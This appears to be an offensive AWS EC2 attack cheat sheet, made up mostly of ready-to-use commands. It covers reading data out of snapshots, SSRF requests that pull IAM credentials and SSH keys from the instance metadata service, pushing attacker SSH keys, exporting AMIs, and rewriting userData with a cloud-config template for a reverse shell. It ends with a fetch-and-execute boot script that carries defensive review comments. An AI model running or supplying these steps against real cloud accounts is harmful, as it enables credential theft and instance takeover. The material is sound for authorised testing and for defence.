- Port enumeration
- Attack interesting services like ssh or rdp
aws ec2 describe-instances aws ssm describe-instance-information aws ec2 describe-snapshots aws ec2 describe-security-groups --group-ids --region aws ec2 create-volume --snapshot-id snap-123123123 aws ec2 describe-snapshots --owner-ids {user-id}
ssh -i ".ssh/key.pem" @ sudo mount /dev/xvdb1 /mnt cat /mnt/home/ubuntu/setupNginx.sh
aws ec2 describe-security-groups aws ec2 describe-security-groups --filters Name=ip-permission.cidr,Values='0.0.0.0/0' --query "SecurityGroups[*].[GroupName]" --output text
SSRF to http://169.254.169.254 (the EC2 instance metadata service)
curl http:///?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ http://169.254.169.254/latest/meta-data http://169.254.169.254/latest/meta-data/ami-id http://169.254.169.254/latest/meta-data/public-hostname http://169.254.169.254/latest/meta-data/public-keys/ http://169.254.169.254/latest/meta-data/network/interfaces/ http://169.254.169.254/latest/meta-data/local-ipv4 http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key/ http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/meta-data/ http://169.254.169.254/latest/meta-data/iam/ http://169.254.169.254/latest/meta-data/iam/security-credentials/
ec2-metadata -h
If the instance enforces the token-based metadata service (IMDSv2), the plain GET requests above are rejected: a token must first be obtained with a PUT request to http://169.254.169.254/latest/api/token and then sent in the X-aws-ec2-metadata-token header on each metadata request.
curl -s http:///latest/meta-data/ -H 'Host:169.254.169.254'
aws ec2 describe-instances | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}" aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE_WE_GOT_PREVIOUSLY --availability-zone zone --instance-os-user ubuntu --ssh-public-key file://shortkey.pub
aws ec2 describe-images --region specific-region aws ec2 create-image --instance-id ID --name "EXPLOIT" --description "Export AMI" --region specific-region aws ec2 import-key-pair --key-name "EXPLOIT" --public-key-material fileb:///publickeyfile aws ec2 describe-images --filters "Name=name,Values=EXPLOIT" aws ec2 run-instances --image-id {} --security-group-ids "" --subnet-id {} --count 1 --instance-type t2.micro --key-name EXPLOIT
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone aws ec2 attach-volume --volume-id above-volume-id --instance-id instance-id --device /dev/sdf
aws ec2 modify-instance-attribute --instance-id=xxx --attribute userData --value file://file.b64.txt — where file.b64.txt is produced with `base64 file.txt > file.b64.txt` and file.txt contains:
Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0
--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"
#cloud-config
cloud_final_modules:
- [scripts-user, always]
--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"
#!/bin/bash
**commands here** (reverse shell, set ssh keys...)
--//
On first launch, the EC2 instance downloads start_script.sh from the S3 bucket into /root and executes it. Anyone who can write to that bucket location therefore controls what runs on the instance and can escalate privileges or take it over.
#!/bin/bash
# Example first-boot script: fetch start_script.sh from the example S3
# bucket, make it executable and run it.
# NOTE(review): whatever is stored at s3://example-boot-bucket/start_script.sh
# runs here with this script's privileges (it writes under /root, so
# presumably root) — any principal with write access to that object
# effectively controls the instance. Mitigations to consider: restrict write
# access to the bucket/prefix, and verify the object's provenance (pinned
# version or known digest) before executing it.
aws s3 cp s3://example-boot-bucket/start_script.sh /root/start_script.sh
# No status check on the download: if it fails, a pre-existing
# /root/start_script.sh (if any) would still be executed below.
chmod +x /root/start_script.sh
/root/start_script.sh